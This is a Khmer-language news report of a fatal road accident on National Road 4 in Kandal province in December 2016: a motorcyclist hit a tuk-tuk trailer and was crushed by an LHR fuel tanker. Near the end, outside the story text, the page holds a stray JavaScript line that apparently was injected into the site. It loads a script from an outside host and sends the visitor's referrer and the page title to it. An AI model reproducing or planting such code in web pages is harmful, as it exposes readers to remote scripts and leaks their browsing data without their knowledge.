Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ជិះម៉ូតូប៉ះរ៉ឺម៉ក ដួលចូលរថយន្តសុីទែនដឹកសាំង LHR កិនស្លាប់ភ្លាមៗ

ខេត្តកណ្តាល៖ តាមសេចក្តីរាយការណ៍របស់សមត្ថកិច្ចខេត្តកណ្តាល នៅថ្ងៃទី១៧.១២.២០១៦ វេលាម៉ោង១៨.១៥នាទី ចំណុចភូមិ ត្រពាំវែង ឃុំ ឆក់ឈើនាង ស្រុកអង្គស្នួល ខេត្តកណ្ដាល ផ្លូវជាតិលេខ៤ចន្លោះគីឡូម៉ែត្រលេខ ២៤-២៥ បណ្ដាលឲ្យស្លាប់០១នាក់ ប្រុស នៅកន្លែងកើតហេតុ ។ប្រភពអោយដឹងថានៅថ្ងៃខែឆ្នាំនិងវេលាម៉ោងកើតហេតុខាងលើ មានម៉ូតូ០១គ្រឿងម៉ាក ហុងដាសេ១២៥ពណ៌ខ្មៅ លេខ ភ្នំពេញ 1CS-4875 បើកបរដោយឈ្មោះ ផុន ភន ភេទប្រុសអាយុ៤៧ នៅភូមិត្រប់វែង ឃុំសែនដី ស្រុកសំរោងទង ខេត្តកំពង៉ស្ពឺ (មានមួក កញ្ចក់) មុខរបរកម្មករសំណង់ បេីកបរមកពីទិសខាងកើតទៅទិសខាងលិច (ភ្នំពេញ -ព្រះសីហនុ) លុះដល់ចំណុចខាងលើបានប៉ះ និង ម៉ូតូ រ៉ឺម៉ក១គ្រឿង (បើករត់គេចបាត់)ស្របទិសគ្នា ក៍ដួលខ្ទាតចូលចំកង់រ៉ឺម៉ក ដឹកស៊ីទែនប្រេងរថយន្ត១គ្រឿង ម៉ាក អាស្យា ពណ៌ក្រហមខៀវ.ស ផ្លាកលេខ ក្បាលរថយន្ត ភ្នំពេញ 3A- 3253 លេខកន្ទុយរ៉ឺម៉ក ភ្នំពេញ4A-8979 ដឹកស៊ីទែនប្រេង LHR បើកបរដោយឈ្មោះ ប៉ូច ស៊ីថា ភេទប្រុស អាយុ៣២ឆ្នាំ ស្នាក់នៅក្នុងក្រុមហ៊ុប្រេង LHR ដែលបើកពីកើតទៅលិច (ភ្នំពេញ-ព្រះសីហនុ) ក្នុងទិសដៅស្របគ្នា បណ្តាលឲ្យស្លាប់១នាក់ប្រុស.ខូចខាតម៉ូតូ ។

តាមការសន្និដ្ឋានរបស់សមត្ថកិច្ច ករណីនេះបណ្ដាលមកពីអ្នកបើកបរម៉ូតូបើកក្នុងល្បឿនលឿនខ្វះការប្រុងប្រយ័ត្ន។

បច្ចុប្បន្ន សពបានប្រគល់ជូនក្រុមគ្រួសារយកទៅធ្វើបុណ្យតាមប្រពៃណី ករណីនេះកម្លាំងជំនាញបានធ្វើការកសាងសំណុំរឿងបន្តចាត់ការ ទៅតាមនីតិវិធី។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More